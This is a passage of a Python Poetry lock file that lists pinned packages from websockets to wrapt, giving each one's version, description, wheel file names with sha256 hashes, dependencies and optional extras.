{file = "websockets-12.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2e5fc14ec6ea568200ea4ef46545073da81900a2b67b3e666f04adf53ad452ec"},
{file = "websockets-12.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:46e71dbbd12850224243f5d2aeec90f0aaa0f2dde5aeeb8fc8df21e04d99eff9"},
{file = "websockets-12.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:b81f90dcc6c85a9b7f29873beb56c94c85d6f0dac2ea8b60d995bd18bf3e2aae"},
{file = "websockets-12.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:a02413bc474feda2849c59ed2dfb2cddb4cd3d2f03a2fedec51d6e959d9b608b"},
{file = "websockets-12.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bbe6013f9f791944ed31ca08b077e26249309639313fff132bfbf3ba105673b9"},
{file = "websockets-12.0-cp39-cp39-win32.whl", hash = "sha256:cbe83a6bbdf207ff0541de01e11904827540aa069293696dd528a6640bd6a5f6"},
{file = "websockets-12.0-cp39-cp39-win_amd64.whl", hash = "sha256:fc4e7fa5414512b481a2483775a8e8be7803a35b30ca805afa4998a84f9fd9e8"},
{file = "websockets-12.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:248d8e2446e13c1d4326e0a6a4e9629cb13a11195051a73acf414812700badbd"},
{file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:f44069528d45a933997a6fef143030d8ca8042f0dfaad753e2906398290e2870"},
{file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c4e37d36f0d19f0a4413d3e18c0d03d0c268ada2061868c1e6f5ab1a6d575077"},
{file = "websockets-12.0-pp310-pypy310_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3d829f975fc2e527a3ef2f9c8f25e553eb7bc779c6665e8e1d52aa22800bb38b"},
{file = "websockets-12.0-pp310-pypy310_pp73-win_amd64.whl", hash = "sha256:2c71bd45a777433dd9113847af751aae36e448bc6b8c361a566cb043eda6ec30"},
{file = "websockets-12.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:0bee75f400895aef54157b36ed6d3b308fcab62e5260703add87f44cee9c82a6"},
{file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:423fc1ed29f7512fceb727e2d2aecb952c46aa34895e9ed96071821309951123"},
{file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:27a5e9964ef509016759f2ef3f2c1e13f403725a5e6a1775555994966a66e931"},
{file = "websockets-12.0-pp38-pypy38_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c3181df4583c4d3994d31fb235dc681d2aaad744fbdbf94c4802485ececdecf2"},
{file = "websockets-12.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:b067cb952ce8bf40115f6c19f478dc71c5e719b7fbaa511359795dfd9d1a6468"},
{file = "websockets-12.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:00700340c6c7ab788f176d118775202aadea7602c5cc6be6ae127761c16d6b0b"},
{file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e469d01137942849cff40517c97a30a93ae79917752b34029f0ec72df6b46399"},
{file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ffefa1374cd508d633646d51a8e9277763a9b78ae71324183693959cf94635a7"},
{file = "websockets-12.0-pp39-pypy39_pp73-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ba0cab91b3956dfa9f512147860783a1829a8d905ee218a9837c18f683239611"},
{file = "websockets-12.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:2cb388a5bfb56df4d9a406783b7f9dbefb888c09b71629351cc6b036e9259370"},
{file = "websockets-12.0-py3-none-any.whl", hash = "sha256:dc284bbc8d7c78a6c69e0c7325ab46ee5e40bb4d50e494d8131a07ef47500e9e"},
{file = "websockets-12.0.tar.gz", hash = "sha256:81df9cbcbb6c260de1e007e58c011bfebe2dafc8435107b0537f393dd38c8b1b"},
]
[[package]]
name = "werkzeug"
version = "3.0.1"
description = "The comprehensive WSGI web application library."
optional = true
python-versions = ">=3.8"
files = [
{file = "werkzeug-3.0.1-py3-none-any.whl", hash = "sha256:90a285dc0e42ad56b34e696398b8122ee4c681833fb35b8334a095d82c56da10"},
{file = "werkzeug-3.0.1.tar.gz", hash = "sha256:507e811ecea72b18a404947aded4b3390e1db8f826b494d76550ef45bb3b1dcc"},
]
[package.dependencies]
MarkupSafe = ">=2.1.1"
[package.extras]
watchdog = ["watchdog (>=2.3)"]
[[package]]
name = "wget"
version = "3.2"
description = "pure python download utility"
optional = true
python-versions = "*"
files = [
{file = "wget-3.2.zip", hash = "sha256:35e630eca2aa50ce998b9b1a127bb26b30dfee573702782aa982f875e3f16061"},
]
[[package]]
name = "wheel"
version = "0.41.2"
description = "A built-package format for Python"
optional = true
python-versions = ">=3.7"
files = [
{file = "wheel-0.41.2-py3-none-any.whl", hash = "sha256:75909db2664838d015e3d9139004ee16711748a52c8f336b52882266540215d8"},
{file = "wheel-0.41.2.tar.gz", hash = "sha256:0c5ac5ff2afb79ac23ab82bab027a0be7b5dbcf2e54dc50efe4bf507de1f7985"},
]
[package.extras]
test = ["pytest (>=6.0.0)", "setuptools (>=65)"]
[[package]]
name = "whylabs-client"
version = "0.5.8"
description = "WhyLabs API client"
optional = true
python-versions = ">=3.6"
files = [
{file = "whylabs-client-0.5.8.tar.gz", hash = "sha256:7f71a036f88fc2e21d89e56246db7e42547b40bf1f45bb74c28532e173206525"},
{file = "whylabs_client-0.5.8-py3-none-any.whl", hash = "sha256:26b6b481eb806ed006ff29c4ed8845acdba3fccc84333419aad628a7540a9dec"},
]
[package.dependencies]
python-dateutil = "*"
urllib3 = ">=1.25.3"
[[package]]
name = "whylogs"
version = "1.3.11"
description = "Profile and monitor your ML data pipeline end-to-end"
optional = true
python-versions = ">=3.7.1,<4"
files = [
{file = "whylogs-1.3.11-py3-none-any.whl", hash = "sha256:9011b2fc2023974d337633b627955d4ab2f53b796e1fc4a27c7530c3d394a315"},
{file = "whylogs-1.3.11.tar.gz", hash = "sha256:fa83af0fb84d0868d032d871ce2db83398aea9f3b220c6a5937dd1e03f3d4abb"},
]
[package.dependencies]
platformdirs = ">=3.5.0,<4.0.0"
protobuf = ">=3.19.4"
requests = ">=2.27,<3.0"
types-requests = ">=2.30.0.0,<3.0.0.0"
typing-extensions = {version = ">=3.10", markers = "python_version < \"4\""}
whylabs-client = ">=0.5.6,<0.6.0"
whylogs-sketching = ">=3.4.1.dev3"
[package.extras]
all = ["Pillow (>=9.2.0,<10.0.0)", "boto3 (>=1.22.13,<2.0.0)", "faster-fifo (>=1.4.5,<2.0.0)", "fugue (>=0.8.1,<0.9.0)", "google-cloud-storage (>=2.5.0,<3.0.0)", "ipython", "mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)", "numpy", "numpy (>=1.23.2)", "orjson (>=3.8.10,<4.0.0)", "pandas", "pyarrow (>=8.0.0,<13)", "pybars3 (>=0.9,<0.10)", "pyspark (>=3.0.0,<4.0.0)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)", "scipy (>=1.5)", "scipy (>=1.9.2)"]
datasets = ["pandas"]
docs = ["furo (>=2022.3.4,<2023.0.0)", "ipython_genutils (>=0.2.0,<0.3.0)", "myst-parser[sphinx] (>=0.17.2,<0.18.0)", "nbconvert (>=7.0.0,<8.0.0)", "nbsphinx (>=0.8.9,<0.9.0)", "sphinx", "sphinx-autoapi", "sphinx-autobuild (>=2021.3.14,<2022.0.0)", "sphinx-copybutton (>=0.5.0,<0.6.0)", "sphinx-inline-tabs", "sphinxext-opengraph (>=0.6.3,<0.7.0)"]
embeddings = ["numpy", "numpy (>=1.23.2)", "scikit-learn (>=1.0.2,<2.0.0)", "scikit-learn (>=1.1.2,<2)"]
fugue = ["fugue (>=0.8.1,<0.9.0)"]
gcs = ["google-cloud-storage (>=2.5.0,<3.0.0)"]
image = ["Pillow (>=9.2.0,<10.0.0)", "numpy", "numpy (>=1.23.2)"]
mlflow = ["mlflow-skinny (<2.0.1)", "mlflow-skinny (>=2.5.0,<3.0.0)"]
proc = ["faster-fifo (>=1.4.5,<2.0.0)", "orjson (>=3.8.10,<4.0.0)", "pandas"]
proc-mp = ["orjson (>=3.8.10,<4.0.0)", "pandas"]
s3 = ["boto3 (>=1.22.13,<2.0.0)"]
spark = ["pyarrow (>=8.0.0,<13)", "pyspark (>=3.0.0,<4.0.0)"]
viz = ["Pillow (>=9.2.0,<10.0.0)", "ipython", "numpy", "numpy (>=1.23.2)", "pybars3 (>=0.9,<0.10)", "scipy (>=1.5)", "scipy (>=1.9.2)"]
[[package]]
name = "whylogs-sketching"
version = "3.4.1.dev3"
description = "sketching library of whylogs"
optional = true
python-versions = "*"
files = [
{file = "whylogs-sketching-3.4.1.dev3.tar.gz", hash = "sha256:40b90eb9d5e4cbbfa63f6a1f3a3332b72258d270044b79030dc5d720fddd9499"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:9c20134eda881064099264f795d60321777b5e6c2357125a7a2787c9f15db684"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:e76ac4c2d0214b8de8598867e721f774cca8877267bc2a9b2d0d06950fe76bd5"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:edc2b463d926ccacb7ee2147d206850bb0cbfea8766f091e8c575ada48db1cfd"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:fdc2a3bd73895d1ffac1b3028ff55aaa6b60a9ec42d7b6b5785fa140f303dec0"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:46460eefcf22bcf20b0e6208de32e358478c17b1239221eb038d434f14ec427c"},
{file = "whylogs_sketching-3.4.1.dev3-cp310-cp310-win_amd64.whl", hash = "sha256:58b99a070429a7119a5727ac61c4e9ebcd6e92eed3d2646931a487fff3d6630e"},
{file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:531a4af8f707c1e8138a4ae41a117ba53241372bf191666a9e6b44ab6cd9e634"},
{file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ba536fca5f9578fa34d106c243fdccfef7d75b9d1fffb9d93df0debfe8e3ebc"},
{file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:afa843c68cafa08e82624e6a33d13ab7f00ad0301101960872fe152d5af5ab53"},
{file = "whylogs_sketching-3.4.1.dev3-cp311-cp311-win_amd64.whl", hash = "sha256:303d55c37565340c2d21c268c64a712fad612504cc4b98b1d1df848cac6d934f"},
{file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:9d65fcf8dade1affe50181582b8894929993e37d7daa922d973a811790cd0208"},
{file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c4845e77c208ae64ada9170e1b92ed0abe28fe311c0fc35f9d8efa6926211ca2"},
{file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:02cac1c87ac42d7fc7e6597862ac50bc035825988d21e8a2d763b416e83e845f"},
{file = "whylogs_sketching-3.4.1.dev3-cp36-cp36m-win_amd64.whl", hash = "sha256:52a174784e69870543fb87910e5549759f01a7f4cb6cac1773b2cc194ec0b72f"},
{file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0931fc7500b78baf8f44222f1e3b58cfb707b0120328bc16cc50beaab5a954ec"},
{file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:803c104338a5c4e1c6eb077d35ca3a4443e455aa4e7f2769c93560bf135cdeb3"},
{file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:49e8f20351077497880b088dff9342f4b54d2d3c650c0b43daf121d97fb42468"},
{file = "whylogs_sketching-3.4.1.dev3-cp37-cp37m-win_amd64.whl", hash = "sha256:f9f3507b5df34de7a95b75f80009644371dd6406f9d8795e820edf8a594aeacc"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2986dd5b35a93267e6d89e7aa256f714105bbe61bdb0381aeab588c2688e46b6"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:14f1bf4903e9cd2a196fe5a7268cca1434d423233e073917130d5b845f539c2a"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2ecfe0e4a629a4cefec9d7c7fac234119688085ba5f62feabed710cb5a322f8b"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:000e2c11b7bbbdefb3a343c15955868a682c02d607557fef7bad5a6ffd09a0cf"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1e70ed1ed2f9c174a80673ae2ca24c1ec0e2a01c0bd6b0728640492fd5a50178"},
{file = "whylogs_sketching-3.4.1.dev3-cp38-cp38-win_amd64.whl", hash = "sha256:9efd56d5a21566fc49126ef54d37116078763bb9f8955b9c77421b4ca3fd8fc6"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:832247fd9d3ecf13791418a75c359db6c3aeffd51d7372d026e95f307ef286cc"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:cc81b547e331d96f6f4227280b9b5968ca4bd48dd7cb0c8b68c022037800009f"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3abf13da4347393a302843c2f06ce4e5fc56fd9c8564f64da13ceafb81eef90b"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d1d6e7d0ddb66ab725d7af63518ef6a24cd45b075b81e1d2081709df4c989853"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:0b05112e3f70cfccddd2f72e464fa113307d97188891433133d4219b9f8f5456"},
{file = "whylogs_sketching-3.4.1.dev3-cp39-cp39-win_amd64.whl", hash = "sha256:23759a00dd0e7019fbac06d9e9ab005ad6c14f80ec7935ccebccb7127296bc06"},
]
[[package]]
name = "widgetsnbextension"
version = "4.0.9"
description = "Jupyter interactive widgets for Jupyter Notebook"
optional = false
python-versions = ">=3.7"
files = [
{file = "widgetsnbextension-4.0.9-py3-none-any.whl", hash = "sha256:91452ca8445beb805792f206e560c1769284267a30ceb1cec9f5bcc887d15175"},
{file = "widgetsnbextension-4.0.9.tar.gz", hash = "sha256:3c1f5e46dc1166dfd40a42d685e6a51396fd34ff878742a3e47c6f0cc4a2a385"},
]
[[package]]
name = "wikipedia"
version = "1.4.0"
description = "Wikipedia API for Python"
optional = true
python-versions = "*"
files = [
{file = "wikipedia-1.4.0.tar.gz", hash = "sha256:db0fad1829fdd441b1852306e9856398204dc0786d2996dd2e0c8bb8e26133b2"},
]
[package.dependencies]
beautifulsoup4 = "*"
requests = ">=2.0.0,<3.0.0"
[[package]]
name = "win32-setctime"
version = "1.1.0"
description = "A small Python utility to set file creation time on Windows"
optional = true
python-versions = ">=3.5"
files = [
{file = "win32_setctime-1.1.0-py3-none-any.whl", hash = "sha256:231db239e959c2fe7eb1d7dc129f11172354f98361c4fa2d6d2d7e278baa8aad"},
{file = "win32_setctime-1.1.0.tar.gz", hash = "sha256:15cf5750465118d6929ae4de4eb46e8edae9a5634350c01ba582df868e932cb2"},
]
[package.extras]
dev = ["black (>=19.3b0)", "pytest (>=4.6.2)"]
[[package]]
name = "wolframalpha"
version = "5.0.0"
description = "Wolfram|Alpha 2.0 API client"
optional = true
python-versions = ">=3.6"
files = [
{file = "wolframalpha-5.0.0-py3-none-any.whl", hash = "sha256:159f5d8fd31e4a734a34a9f3ae8aec4e9b2ef392607f82069b4a324b6b1831d5"},
{file = "wolframalpha-5.0.0.tar.gz", hash = "sha256:38bf27654039ec85cc62c199dd319b6a4d6a7badfed7af1cd161f081afdb57c0"},
]
[package.dependencies]
"jaraco.context" = "*"
more-itertools = "*"
xmltodict = "*"
[package.extras]
docs = ["jaraco.packaging (>=8.2)", "rst.linker (>=1.9)", "sphinx"]
testing = ["keyring", "pmxbot", "pytest (>=3.5,!=3.7.3)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=1.2.3)", "pytest-cov", "pytest-enabler", "pytest-flake8", "pytest-mypy"]
[[package]]
name = "wonderwords"
version = "2.2.0"
description = "A python package for random words and sentences in the english language"
optional = true
python-versions = ">=3.6"
files = [
{file = "wonderwords-2.2.0-py3-none-any.whl", hash = "sha256:65fc665f1f5590e98f6d9259414ea036bf1b6dd83e51aa6ba44473c99ca92da1"},
{file = "wonderwords-2.2.0.tar.gz", hash = "sha256:0b7ec6f591062afc55603bfea71463afbab06794b3064d9f7b04d0ce251a13d0"},
]
[package.extras]
cli = ["rich (==9.10.0)"]
[[package]]
name = "wrapt"
version = "1.15.0"
description = "Module for decorators, wrappers and monkey patching."
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7"
files = [
{file = "wrapt-1.15.0-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:ca1cccf838cd28d5a0883b342474c630ac48cac5df0ee6eacc9c7290f76b11c1"},
{file = "wrapt-1.15.0-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:e826aadda3cae59295b95343db8f3d965fb31059da7de01ee8d1c40a60398b29"},
{file = "wrapt-1.15.0-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:5fc8e02f5984a55d2c653f5fea93531e9836abbd84342c1d1e17abc4a15084c2"},
{file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:96e25c8603a155559231c19c0349245eeb4ac0096fe3c1d0be5c47e075bd4f46"},
{file = "wrapt-1.15.0-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:40737a081d7497efea35ab9304b829b857f21558acfc7b3272f908d33b0d9d4c"},
{file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:f87ec75864c37c4c6cb908d282e1969e79763e0d9becdfe9fe5473b7bb1e5f09"},
{file = "wrapt-1.15.0-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:1286eb30261894e4c70d124d44b7fd07825340869945c79d05bda53a40caa079"},
{file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:493d389a2b63c88ad56cdc35d0fa5752daac56ca755805b1b0c530f785767d5e"},
{file = "wrapt-1.15.0-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:58d7a75d731e8c63614222bcb21dd992b4ab01a399f1f09dd82af17bbfc2368a"},
{file = "wrapt-1.15.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:21f6d9a0d5b3a207cdf7acf8e58d7d13d463e639f0c7e01d82cdb671e6cb7923"},
{file = "wrapt-1.15.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:ce42618f67741d4697684e501ef02f29e758a123aa2d669e2d964ff734ee00ee"},
{file = "wrapt-1.15.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:41d07d029dd4157ae27beab04d22b8e261eddfc6ecd64ff7000b10dc8b3a5727"},
{file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:54accd4b8bc202966bafafd16e69da9d5640ff92389d33d28555c5fd4f25ccb7"},
{file = "wrapt-1.15.0-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2fbfbca668dd15b744418265a9607baa970c347eefd0db6a518aaf0cfbd153c0"},
{file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:76e9c727a874b4856d11a32fb0b389afc61ce8aaf281ada613713ddeadd1cfec"},
{file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:e20076a211cd6f9b44a6be58f7eeafa7ab5720eb796975d0c03f05b47d89eb90"},
{file = "wrapt-1.15.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:a74d56552ddbde46c246b5b89199cb3fd182f9c346c784e1a93e4dc3f5ec9975"},
{file = "wrapt-1.15.0-cp310-cp310-win32.whl", hash = "sha256:26458da5653aa5b3d8dc8b24192f574a58984c749401f98fff994d41d3f08da1"},
{file = "wrapt-1.15.0-cp310-cp310-win_amd64.whl", hash = "sha256:75760a47c06b5974aa5e01949bf7e66d2af4d08cb8c1d6516af5e39595397f5e"},
{file = "wrapt-1.15.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ba1711cda2d30634a7e452fc79eabcadaffedf241ff206db2ee93dd2c89a60e7"},
{file = "wrapt-1.15.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:56374914b132c702aa9aa9959c550004b8847148f95e1b824772d453ac204a72"},
{file = "wrapt-1.15.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a89ce3fd220ff144bd9d54da333ec0de0399b52c9ac3d2ce34b569cf1a5748fb"},
{file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3bbe623731d03b186b3d6b0d6f51865bf598587c38d6f7b0be2e27414f7f214e"},
{file = "wrapt-1.15.0-cp311-cp311-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3abbe948c3cbde2689370a262a8d04e32ec2dd4f27103669a45c6929bcdbfe7c"},
{file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b67b819628e3b748fd3c2192c15fb951f549d0f47c0449af0764d7647302fda3"},
{file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:7eebcdbe3677e58dd4c0e03b4f2cfa346ed4049687d839adad68cc38bb559c92"},
{file = "wrapt-1.15.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:74934ebd71950e3db69960a7da29204f89624dde411afbfb3b4858c1409b1e98"},
{file = "wrapt-1.15.0-cp311-cp311-win32.whl", hash = "sha256:bd84395aab8e4d36263cd1b9308cd504f6cf713b7d6d3ce25ea55670baec5416"},
{file = "wrapt-1.15.0-cp311-cp311-win_amd64.whl", hash = "sha256:a487f72a25904e2b4bbc0817ce7a8de94363bd7e79890510174da9d901c38705"},
{file = "wrapt-1.15.0-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:4ff0d20f2e670800d3ed2b220d40984162089a6e2c9646fdb09b85e6f9a8fc29"},
{file = "wrapt-1.15.0-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:9ed6aa0726b9b60911f4aed8ec5b8dd7bf3491476015819f56473ffaef8959bd"},
{file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:896689fddba4f23ef7c718279e42f8834041a21342d95e56922e1c10c0cc7afb"},
{file = "wrapt-1.15.0-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:75669d77bb2c071333417617a235324a1618dba66f82a750362eccbe5b61d248"},
{file = "wrapt-1.15.0-cp35-cp35m-win32.whl", hash = "sha256:fbec11614dba0424ca72f4e8ba3c420dba07b4a7c206c8c8e4e73f2e98f4c559"},
{file = "wrapt-1.15.0-cp35-cp35m-win_amd64.whl", hash = "sha256:fd69666217b62fa5d7c6aa88e507493a34dec4fa20c5bd925e4bc12fce586639"},
{file = "wrapt-1.15.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:b0724f05c396b0a4c36a3226c31648385deb6a65d8992644c12a4963c70326ba"},
{file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bbeccb1aa40ab88cd29e6c7d8585582c99548f55f9b2581dfc5ba68c59a85752"},
{file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:38adf7198f8f154502883242f9fe7333ab05a5b02de7d83aa2d88ea621f13364"},
{file = "wrapt-1.15.0-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:578383d740457fa790fdf85e6d346fda1416a40549fe8db08e5e9bd281c6a475"},
{file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:a4cbb9ff5795cd66f0066bdf5947f170f5d63a9274f99bdbca02fd973adcf2a8"},
{file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:af5bd9ccb188f6a5fdda9f1f09d9f4c86cc8a539bd48a0bfdc97723970348418"},
{file = "wrapt-1.15.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:b56d5519e470d3f2fe4aa7585f0632b060d532d0696c5bdfb5e8319e1d0f69a2"},
{file = "wrapt-1.15.0-cp36-cp36m-win32.whl", hash = "sha256:77d4c1b881076c3ba173484dfa53d3582c1c8ff1f914c6461ab70c8428b796c1"},
{file = "wrapt-1.15.0-cp36-cp36m-win_amd64.whl", hash = "sha256:077ff0d1f9d9e4ce6476c1a924a3332452c1406e59d90a2cf24aeb29eeac9420"},
{file = "wrapt-1.15.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5c5aa28df055697d7c37d2099a7bc09f559d5053c3349b1ad0c39000e611d317"},
{file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3a8564f283394634a7a7054b7983e47dbf39c07712d7b177b37e03f2467a024e"},
{file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:780c82a41dc493b62fc5884fb1d3a3b81106642c5c5c78d6a0d4cbe96d62ba7e"},
{file = "wrapt-1.15.0-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e169e957c33576f47e21864cf3fc9ff47c223a4ebca8960079b8bd36cb014fd0"},
{file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:b02f21c1e2074943312d03d243ac4388319f2456576b2c6023041c4d57cd7019"},
{file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f2e69b3ed24544b0d3dbe2c5c0ba5153ce50dcebb576fdc4696d52aa22db6034"},
{file = "wrapt-1.15.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:d787272ed958a05b2c86311d3a4135d3c2aeea4fc655705f074130aa57d71653"},
{file = "wrapt-1.15.0-cp37-cp37m-win32.whl", hash = "sha256:02fce1852f755f44f95af51f69d22e45080102e9d00258053b79367d07af39c0"},
{file = "wrapt-1.15.0-cp37-cp37m-win_amd64.whl", hash = "sha256:abd52a09d03adf9c763d706df707c343293d5d106aea53483e0ec8d9e310ad5e"},
{file = "wrapt-1.15.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:cdb4f085756c96a3af04e6eca7f08b1345e94b53af8921b25c72f096e704e145"},
{file = "wrapt-1.15.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:230ae493696a371f1dbffaad3dafbb742a4d27a0afd2b1aecebe52b740167e7f"},
{file = "wrapt-1.15.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:63424c681923b9f3bfbc5e3205aafe790904053d42ddcc08542181a30a7a51bd"},
